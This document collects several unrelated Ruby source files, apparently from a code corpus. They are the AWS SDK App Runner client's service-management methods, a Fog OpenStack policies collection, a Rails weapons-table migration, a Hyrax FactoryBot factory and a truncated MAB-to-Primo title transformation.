# your service.
#
#
#
# [1]: https://docs.aws.amazon.com/acm/latest/userguide
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to disassociate a custom domain name from.
#
# @option params [required, String] :domain_name
# The domain name that you want to disassociate from the App Runner
# service.
#
# @return [Types::DisassociateCustomDomainResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DisassociateCustomDomainResponse#dns_target #dns_target} => String
# * {Types::DisassociateCustomDomainResponse#service_arn #service_arn} => String
# * {Types::DisassociateCustomDomainResponse#custom_domain #custom_domain} => Types::CustomDomain
#
# @example Request syntax with placeholder values
#
# resp = client.disassociate_custom_domain({
# service_arn: "AppRunnerResourceArn", # required
# domain_name: "DomainName", # required
# })
#
# @example Response structure
#
# resp.dns_target #=> String
# resp.service_arn #=> String
# resp.custom_domain.domain_name #=> String
# resp.custom_domain.enable_www_subdomain #=> Boolean
# resp.custom_domain.certificate_validation_records #=> Array
# resp.custom_domain.certificate_validation_records[0].name #=> String
# resp.custom_domain.certificate_validation_records[0].type #=> String
# resp.custom_domain.certificate_validation_records[0].value #=> String
# resp.custom_domain.certificate_validation_records[0].status #=> String, one of "PENDING_VALIDATION", "SUCCESS", "FAILED"
# resp.custom_domain.status #=> String, one of "CREATING", "CREATE_FAILED", "ACTIVE", "DELETING", "DELETE_FAILED", "PENDING_CERTIFICATE_DNS_VALIDATION", "BINDING_CERTIFICATE"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DisassociateCustomDomain AWS API Documentation
#
# @overload disassociate_custom_domain(params = {})
# @param [Hash] params ({})
def disassociate_custom_domain(params = {}, options = {})
req = build_request(:disassociate_custom_domain, params)
req.send_request(options)
end
# Returns a list of AWS App Runner automatic scaling configurations in
# your AWS account. You can query the revisions for a specific
# configuration name or the revisions for all configurations in your
# account. You can optionally query only the latest revision of each
# requested name.
#
# @option params [String] :auto_scaling_configuration_name
# The name of the App Runner auto scaling configuration that you want to
# list. If specified, App Runner lists revisions that share this name.
# If not specified, App Runner returns revisions of all configurations.
#
# @option params [Boolean] :latest_only
# Set to `true` to list only the latest revision for each requested
# configuration name.
#
# Keep as `false` to list all revisions for each requested configuration
# name.
#
# Default: `false`
#
# @option params [Integer] :max_results
# The maximum number of results to include in each response (result
# page). It's used for a paginated request.
#
# If you don't specify `MaxResults`, the request retrieves all
# available results in a single response.
#
# @option params [String] :next_token
# A token from a previous result page. It's used for a paginated
# request. The request retrieves the next result page. All other
# parameter values must be identical to the ones that are specified in
# the initial request.
#
# If you don't specify `NextToken`, the request retrieves the first
# result page.
#
# @return [Types::ListAutoScalingConfigurationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListAutoScalingConfigurationsResponse#auto_scaling_configuration_summary_list #auto_scaling_configuration_summary_list} => Array<Types::AutoScalingConfigurationSummary>
# * {Types::ListAutoScalingConfigurationsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_auto_scaling_configurations({
# auto_scaling_configuration_name: "AutoScalingConfigurationName",
# latest_only: false,
# max_results: 1,
# next_token: "NextToken",
# })
#
# @example Response structure
#
# resp.auto_scaling_configuration_summary_list #=> Array
# resp.auto_scaling_configuration_summary_list[0].auto_scaling_configuration_arn #=> String
# resp.auto_scaling_configuration_summary_list[0].auto_scaling_configuration_name #=> String
# resp.auto_scaling_configuration_summary_list[0].auto_scaling_configuration_revision #=> Integer
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ListAutoScalingConfigurations AWS API Documentation
#
# @overload list_auto_scaling_configurations(params = {})
# @param [Hash] params ({})
def list_auto_scaling_configurations(params = {}, options = {})
req = build_request(:list_auto_scaling_configurations, params)
req.send_request(options)
end
# Returns a list of AWS App Runner connections that are associated with
# your AWS account.
#
# @option params [String] :connection_name
# If specified, only this connection is returned. If not specified, the
# result isn't filtered by name.
#
# @option params [Integer] :max_results
# The maximum number of results to include in each response (result
# page). Used for a paginated request.
#
# If you don't specify `MaxResults`, the request retrieves all
# available results in a single response.
#
# @option params [String] :next_token
# A token from a previous result page. Used for a paginated request. The
# request retrieves the next result page. All other parameter values
# must be identical to the ones specified in the initial request.
#
# If you don't specify `NextToken`, the request retrieves the first
# result page.
#
# @return [Types::ListConnectionsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListConnectionsResponse#connection_summary_list #connection_summary_list} => Array<Types::ConnectionSummary>
# * {Types::ListConnectionsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_connections({
# connection_name: "ConnectionName",
# max_results: 1,
# next_token: "NextToken",
# })
#
# @example Response structure
#
# resp.connection_summary_list #=> Array
# resp.connection_summary_list[0].connection_name #=> String
# resp.connection_summary_list[0].connection_arn #=> String
# resp.connection_summary_list[0].provider_type #=> String, one of "GITHUB"
# resp.connection_summary_list[0].status #=> String, one of "PENDING_HANDSHAKE", "AVAILABLE", "ERROR", "DELETED"
# resp.connection_summary_list[0].created_at #=> Time
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ListConnections AWS API Documentation
#
# @overload list_connections(params = {})
# @param [Hash] params ({})
def list_connections(params = {}, options = {})
req = build_request(:list_connections, params)
req.send_request(options)
end
# Return a list of operations that occurred on an AWS App Runner
# service.
#
# The resulting list of OperationSummary objects is sorted in reverse
# chronological order. The first object on the list represents the last
# started operation.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# a list of operations for.
#
# @option params [String] :next_token
# A token from a previous result page. It's used for a paginated
# request. The request retrieves the next result page. All other
# parameter values must be identical to the ones specified in the
# initial request.
#
# If you don't specify `NextToken`, the request retrieves the first
# result page.
#
# @option params [Integer] :max_results
# The maximum number of results to include in each response (result
# page). It's used for a paginated request.
#
# If you don't specify `MaxResults`, the request retrieves all
# available results in a single response.
#
# @return [Types::ListOperationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListOperationsResponse#operation_summary_list #operation_summary_list} => Array<Types::OperationSummary>
# * {Types::ListOperationsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_operations({
# service_arn: "AppRunnerResourceArn", # required
# next_token: "String",
# max_results: 1,
# })
#
# @example Response structure
#
# resp.operation_summary_list #=> Array
# resp.operation_summary_list[0].id #=> String
# resp.operation_summary_list[0].type #=> String, one of "START_DEPLOYMENT", "CREATE_SERVICE", "PAUSE_SERVICE", "RESUME_SERVICE", "DELETE_SERVICE"
# resp.operation_summary_list[0].status #=> String, one of "PENDING", "IN_PROGRESS", "FAILED", "SUCCEEDED", "ROLLBACK_IN_PROGRESS", "ROLLBACK_FAILED", "ROLLBACK_SUCCEEDED"
# resp.operation_summary_list[0].target_arn #=> String
# resp.operation_summary_list[0].started_at #=> Time
# resp.operation_summary_list[0].ended_at #=> Time
# resp.operation_summary_list[0].updated_at #=> Time
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ListOperations AWS API Documentation
#
# @overload list_operations(params = {})
# @param [Hash] params ({})
def list_operations(params = {}, options = {})
req = build_request(:list_operations, params)
req.send_request(options)
end
# Returns a list of running AWS App Runner services in your AWS account.
#
# @option params [String] :next_token
# A token from a previous result page. Used for a paginated request. The
# request retrieves the next result page. All other parameter values
# must be identical to the ones specified in the initial request.
#
# If you don't specify `NextToken`, the request retrieves the first
# result page.
#
# @option params [Integer] :max_results
# The maximum number of results to include in each response (result
# page). It's used for a paginated request.
#
# If you don't specify `MaxResults`, the request retrieves all
# available results in a single response.
#
# @return [Types::ListServicesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListServicesResponse#service_summary_list #service_summary_list} => Array<Types::ServiceSummary>
# * {Types::ListServicesResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_services({
# next_token: "String",
# max_results: 1,
# })
#
# @example Response structure
#
# resp.service_summary_list #=> Array
# resp.service_summary_list[0].service_name #=> String
# resp.service_summary_list[0].service_id #=> String
# resp.service_summary_list[0].service_arn #=> String
# resp.service_summary_list[0].service_url #=> String
# resp.service_summary_list[0].created_at #=> Time
# resp.service_summary_list[0].updated_at #=> Time
# resp.service_summary_list[0].status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ListServices AWS API Documentation
#
# @overload list_services(params = {})
# @param [Hash] params ({})
def list_services(params = {}, options = {})
req = build_request(:list_services, params)
req.send_request(options)
end
# List tags that are associated with for an AWS App Runner resource. The
# response contains a list of tag key-value pairs.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the resource that a tag list is
# requested for.
#
# It must be the ARN of an App Runner resource.
#
# @return [Types::ListTagsForResourceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListTagsForResourceResponse#tags #tags} => Array<Types::Tag>
#
# @example Request syntax with placeholder values
#
# resp = client.list_tags_for_resource({
# resource_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.tags #=> Array
# resp.tags[0].key #=> String
# resp.tags[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ListTagsForResource AWS API Documentation
#
# @overload list_tags_for_resource(params = {})
# @param [Hash] params ({})
def list_tags_for_resource(params = {}, options = {})
req = build_request(:list_tags_for_resource, params)
req.send_request(options)
end
# Pause an active AWS App Runner service. App Runner reduces compute
# capacity for the service to zero and loses state (for example,
# ephemeral storage is removed).
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the ListOperations call to track the
# operation's progress.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to pause.
#
# @return [Types::PauseServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PauseServiceResponse#service #service} => Types::Service
# * {Types::PauseServiceResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.pause_service({
# service_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/PauseService AWS API Documentation
#
# @overload pause_service(params = {})
# @param [Hash] params ({})
def pause_service(params = {}, options = {})
req = build_request(:pause_service, params)
req.send_request(options)
end
# Resume an active AWS App Runner service. App Runner provisions compute
# capacity for the service.
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the ListOperations call to track the
# operation's progress.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to resume.
#
# @return [Types::ResumeServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ResumeServiceResponse#service #service} => Types::Service
# * {Types::ResumeServiceResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.resume_service({
# service_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ResumeService AWS API Documentation
#
# @overload resume_service(params = {})
# @param [Hash] params ({})
def resume_service(params = {}, options = {})
req = build_request(:resume_service, params)
req.send_request(options)
end
# Initiate a manual deployment of the latest commit in a source code
# repository or the latest image in a source image repository to an AWS
# App Runner service.
#
# For a source code repository, App Runner retrieves the commit and
# builds a Docker image. For a source image repository, App Runner
# retrieves the latest Docker image. In both cases, App Runner then
# deploys the new image to your service and starts a new container
# instance.
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the ListOperations call to track the
# operation's progress.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to manually deploy to.
#
# @return [Types::StartDeploymentResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::StartDeploymentResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.start_deployment({
# service_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/StartDeployment AWS API Documentation
#
# @overload start_deployment(params = {})
# @param [Hash] params ({})
def start_deployment(params = {}, options = {})
req = build_request(:start_deployment, params)
req.send_request(options)
end
# Add tags to, or update the tag values of, an App Runner resource. A
# tag is a key-value pair.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the resource that you want to update
# tags for.
#
# It must be the ARN of an App Runner resource.
#
# @option params [required, Array<Types::Tag>] :tags
# A list of tag key-value pairs to add or update. If a key is new to the
# resource, the tag is added with the provided value. If a key is
# already associated with the resource, the value of the tag is updated.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.tag_resource({
# resource_arn: "AppRunnerResourceArn", # required
# tags: [ # required
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/TagResource AWS API Documentation
#
# @overload tag_resource(params = {})
# @param [Hash] params ({})
def tag_resource(params = {}, options = {})
req = build_request(:tag_resource, params)
req.send_request(options)
end
# Remove tags from an App Runner resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the resource that you want to remove
# tags from.
#
# It must be the ARN of an App Runner resource.
#
# @option params [required, Array<String>] :tag_keys
# A list of tag keys that you want to remove.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.untag_resource({
# resource_arn: "AppRunnerResourceArn", # required
# tag_keys: ["TagKey"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/UntagResource AWS API Documentation
#
# @overload untag_resource(params = {})
# @param [Hash] params ({})
def untag_resource(params = {}, options = {})
req = build_request(:untag_resource, params)
req.send_request(options)
end
# Update an AWS App Runner service. You can update the source
# configuration and instance configuration of the service. You can also
# update the ARN of the auto scaling configuration resource that's
# associated with the service. However, you can't change the name or
# the encryption configuration of the service. These can be set only
# when you create the service.
#
# To update the tags applied to your service, use the separate actions
# TagResource and UntagResource.
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the ListOperations call to track the
# operation's progress.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to update.
#
# @option params [Types::SourceConfiguration] :source_configuration
# The source configuration to apply to the App Runner service.
#
# You can change the configuration of the code or image repository that
# the service uses. However, you can't switch from code to image or the
# other way around. This means that you must provide the same structure
# member of `SourceConfiguration` that you originally included when you
# created the service. Specifically, you can include either
# `CodeRepository` or `ImageRepository`. To update the source
# configuration, set the values to members of the structure that you
# include.
#
# @option params [Types::InstanceConfiguration] :instance_configuration
# The runtime configuration to apply to instances (scaling units) of the
# App Runner service.
#
# @option params [String] :auto_scaling_configuration_arn
# The Amazon Resource Name (ARN) of an App Runner automatic scaling
# configuration resource that you want to associate with your service.
#
# @option params [Types::HealthCheckConfiguration] :health_check_configuration
# The settings for the health check that AWS App Runner performs to
# monitor the health of your service.
#
# @return [Types::UpdateServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateServiceResponse#service #service} => Types::Service
# * {Types::UpdateServiceResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.update_service({
# service_arn: "AppRunnerResourceArn", # required
# source_configuration: {
# code_repository: {
# repository_url: "String", # required
# source_code_version: { # required
# type: "BRANCH", # required, accepts BRANCH
# value: "String", # required
# },
# code_configuration: {
# configuration_source: "REPOSITORY", # required, accepts REPOSITORY, API
# code_configuration_values: {
# runtime: "PYTHON_3", # required, accepts PYTHON_3, NODEJS_12
# build_command: "BuildCommand",
# start_command: "StartCommand",
# port: "String",
# runtime_environment_variables: {
# "RuntimeEnvironmentVariablesKey" => "RuntimeEnvironmentVariablesValue",
# },
# },
# },
# },
# image_repository: {
# image_identifier: "ImageIdentifier", # required
# image_configuration: {
# runtime_environment_variables: {
# "RuntimeEnvironmentVariablesKey" => "RuntimeEnvironmentVariablesValue",
# },
# start_command: "String",
# port: "String",
# },
# image_repository_type: "ECR", # required, accepts ECR, ECR_PUBLIC
# },
# auto_deployments_enabled: false,
# authentication_configuration: {
# connection_arn: "AppRunnerResourceArn",
# access_role_arn: "RoleArn",
# },
# },
# instance_configuration: {
# cpu: "Cpu",
# memory: "Memory",
# instance_role_arn: "RoleArn",
# },
# auto_scaling_configuration_arn: "AppRunnerResourceArn",
# health_check_configuration: {
# protocol: "TCP", # accepts TCP, HTTP
# path: "String",
# interval: 1,
# timeout: 1,
# healthy_threshold: 1,
# unhealthy_threshold: 1,
# },
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/UpdateService AWS API Documentation
#
# @overload update_service(params = {})
# @param [Hash] params ({})
def update_service(params = {}, options = {})
req = build_request(:update_service, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-apprunner'
context[:gem_version] = '1.2.0'
Seahorse::Client::Request.new(handlers, context)
end
# @api private
# @deprecated
def waiter_names
[]
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 50.735551 | 192 | 0.696654 |
08dce3d0e23156446d67261d8d12cd8a25bd4900 | 864 | require 'fog/openstack/models/collection'
require 'fog/identity/openstack/v3/models/policy'
module Fog
module Identity
class OpenStack
class V3
class Policies < Fog::OpenStack::Collection
model Fog::Identity::OpenStack::V3::Policy
def all(options = {})
load_response(service.list_policies(options), 'policies')
end
def find_by_id(id)
cached_policy = find { |policy| policy.id == id }
return cached_policy if cached_policy
policy_hash = service.get_policy(id).body['policy']
Fog::Identity::OpenStack::V3::Policy.new(
policy_hash.merge(:service => service)
)
end
def destroy(id)
policy = find_by_id(id)
policy.destroy
end
end
end
end
end
end
| 26.181818 | 69 | 0.577546 |
ff4c428acb689ba7c9c921205980c2132146ea93 | 293 | class CreateWeapons < ActiveRecord::Migration[6.0]
def change
create_table :weapons do |t|
t.string :name
t.string :weapon_category
t.string :weapon_range
t.string :url
t.references :equipment, foreign_key: true
t.timestamps
end
end
end
| 19.533333 | 50 | 0.645051 |
ac65674ed21e9770c61971f0a11d0b5e60b30a23 | 330 | FactoryBot.define do
factory :collection_type_participant, class: Hyrax::CollectionTypeParticipant do
association :hyrax_collection_type, factory: :collection_type
sequence(:agent_id) { |n| "user#{n}@example.com" }
agent_type { 'user' }
access { Hyrax::CollectionTypeParticipant::MANAGE_ACCESS }
end
end
| 36.666667 | 82 | 0.739394 |
ab98634f84b5dd362d3274c30fb9ca2d437050cd | 4,694 | require "metacrunch/hash"
require "metacrunch/transformator/transformation/step"
require_relative "../mab_to_primo"
require_relative "./helpers/datafield_089"
class Metacrunch::UBPB::Transformations::MabToPrimo::AddTitleDisplay < Metacrunch::Transformator::Transformation::Step
include parent::Helpers::Datafield089
def call
target ? Metacrunch::Hash.add(target, "title_display", title_display) : title_display
end
private
def title_display
# Werk
hauptsachtitel_des_werks_in_ansetzungsform = source.datafields("310", ind2: [:blank, "1"]).value
hauptsachtitel_des_werks_in_vorlageform = source.datafields("331", ind2: [:blank, "1"]).value
hauptsachtitel_des_werks = hauptsachtitel_des_werks_in_ansetzungsform || hauptsachtitel_des_werks_in_vorlageform
allgemeine_matieralbenennung_des_werks = source.datafields("334", ind2: [:blank, "1"]).value
zusätze_zum_hauptsachtitel_des_werks = source.datafields("335", ind2: [:blank, "1"]).value
bandangabe_des_werks = datafield_089.value
# Überordnung
hauptsachtitel_der_überordnung_in_ansetzungsform = source.datafields("310", ind2: "2").value
hauptsachtitel_der_überordnung_in_vorlageform = source.datafields("331", ind2: "2").value
hauptsachtitel_der_überordnung = hauptsachtitel_der_überordnung_in_ansetzungsform || hauptsachtitel_der_überordnung_in_vorlageform
zusätze_zum_hauptsachtitel_der_überordnung = source.datafields("335", ind2: "2").value
ausgabebezeichnung_der_überordnung = source.datafields("403", ind2: "2").value
if hauptsachtitel_der_überordnung && hauptsachtitel_des_werks
[].tap do |_result|
_result << titel_factory(hauptsachtitel_der_überordnung, {
zusätze_zum_hauptsachtitel: zusätze_zum_hauptsachtitel_der_überordnung
})
if bandangabe_des_werks
# füge den Band nicht hinzu, wenn das Werk genauso heißt, bsp. "Anleitungen eine Farbe zu lesen / <rot> : Rot"
if bandangabe_des_werks.gsub(/<|>/, "").downcase != hauptsachtitel_des_werks.downcase
_result << "/"
_result << bandangabe_des_werks
end
end
_result << ":"
_result << titel_factory(hauptsachtitel_des_werks, {
zusätze_zum_hauptsachtitel: zusätze_zum_hauptsachtitel_des_werks,
allgemeine_materialbenennung: allgemeine_matieralbenennung_des_werks
})
end
.compact
.join(" ")
elsif !hauptsachtitel_der_überordnung && hauptsachtitel_des_werks
titel_factory(hauptsachtitel_des_werks, {
zusätze_zum_hauptsachtitel: zusätze_zum_hauptsachtitel_des_werks,
